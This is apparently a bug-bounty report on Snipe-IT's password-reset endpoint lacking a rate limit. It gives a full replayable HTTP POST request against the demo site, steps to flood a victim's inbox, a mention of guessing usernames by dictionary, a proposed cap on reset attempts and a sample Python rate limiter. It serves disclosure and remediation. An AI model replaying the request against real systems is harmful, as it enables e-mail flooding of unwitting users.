Insufficient Granularity of Access Control in snipe/snipe-it
Reported on
Oct 7th 2021
Description
There is no rate limit on the password-reset e-mail endpoint, so an unlimited number of e-mails can be sent to a victim or to any e-mail address.
Proof of Concept
There is no rate limit on the password-reset (return-password) request, which allows an attacker to send unlimited e-mails to a victim or to any e-mail address.
POST /password/email HTTP/1.1
Host: demo.snipeitapp.com
Connection: close
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://demo.snipeitapp.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.snipeitapp.com/password/reset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv48_session=h0w6J6utAn2wIe4EMMkWHJVI2PTaOzBPLLuOH4JG; XSRF-TOKEN=eyJpdiI6IkttM01uZ1lpMHZFY3I5a0wxVlVnUXc9PSIsInZhbHVlIjoiVVlvemxGd3JXQjkxNTh2OTJHNGpDZ3VzTGY4NFc1K1N4dld4ekFiN2h0Y1RscFZJa2pUcFVZVkpzamxKeGZhWG9IdlZxdlhaRkdtQk1iMkZ2dmJpVDc0Zmx2VDJqMkpNY0p6RWpDWW5ZWDV4MHN3OEZIYk1TYTk2aWlOUm9qNU4iLCJtYWMiOiI3ZWY0ZTYyNTNlNDEzZGQzOTI2OTVhYWQ2OWY4M2I3MmZjOWM1MTc4ODYzNGYzYTQ5MGYwY2NlMGE4ODVjNjMxIn0%3D
_token=qNXYj866UOlCog9UfSQl3U8NidUTWwBqKkzG8VoG&username=admin
Set the username= parameter in the POST data to the victim's username. This request can be repeated an unlimited number of times, and the victim's e-mail address will receive an unlimited number of verification e-mails.
Impact
An attacker can send unlimited e-mails to any e-mail address.
Solution:
'reset_password_tries_limit'=>5, 'reset_password_tries'=>"int(10) unsigned DEFAULT '0'",
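The limit proposed above caps how many reset e-mails one account may trigger. The following added example (illustrative code, not Snipe-IT's own implementation) models that cap as a sliding-window limiter keyed by both the target username and the requesting client address, so a single account cannot be flooded and a single client cannot spray many usernames; the limit of 5 mirrors the proposed reset_password_tries_limit, and the one-hour window and sample addresses are assumptions.

```python
from collections import defaultdict, deque


class ResetRequestLimiter:
    """Allow at most `limit` reset e-mails per key in a sliding window.

    Keys are the (case-folded) target username and the client address.
    Illustrative only; not the project's code.
    """

    def __init__(self, limit=5, window_seconds=3600):
        self.limit = limit
        self.window = window_seconds
        # key -> timestamps (seconds) of requests that were allowed
        self._hits = defaultdict(deque)

    def _allowed(self, key, now):
        q = self._hits[key]
        # Drop timestamps that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        return len(q) < self.limit

    def allow(self, username, client_ip, now):
        """Return True if a reset e-mail may be sent for this request."""
        keys = (("user", username.strip().lower()), ("ip", client_ip))
        # Both the account and the client must be under their limits;
        # nothing is recorded for a rejected request.
        if not all(self._allowed(k, now) for k in keys):
            return False
        for k in keys:
            self._hits[k].append(now)
        return True


def simulate(requests, limit=5, window_seconds=3600):
    """Run constructed (username, client_ip, timestamp) requests through the
    limiter and report which ones would have produced an e-mail."""
    limiter = ResetRequestLimiter(limit, window_seconds)
    return [limiter.allow(u, ip, t) for u, ip, t in requests]


if __name__ == "__main__":
    # Constructed sample: seven rapid requests for one account from one client.
    flood = [("admin", "203.0.113.5", t) for t in range(7)]
    print(simulate(flood))  # first five allowed, the rest suppressed
```

The handler should still return the same response whether or not an e-mail was sent, so the limiter does not become a way to confirm which usernames exist.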
While this isn't incorrect, we have never ever seen this exploited in the wild. You'd need to know the URL and username of a user on the system.
Well, yes, we need that; for every attack we need the URL, don't we? And about the valid username: an attacker may or may not know the username and can do a dictionary attack to perform the attack.
https://hackerone.com/reports/145458 And please do refer to this previously submitted report too: https://huntr.dev/bounties/d33cd2a3-1cff-4a9d-a0d1-df7d01e2d1e2/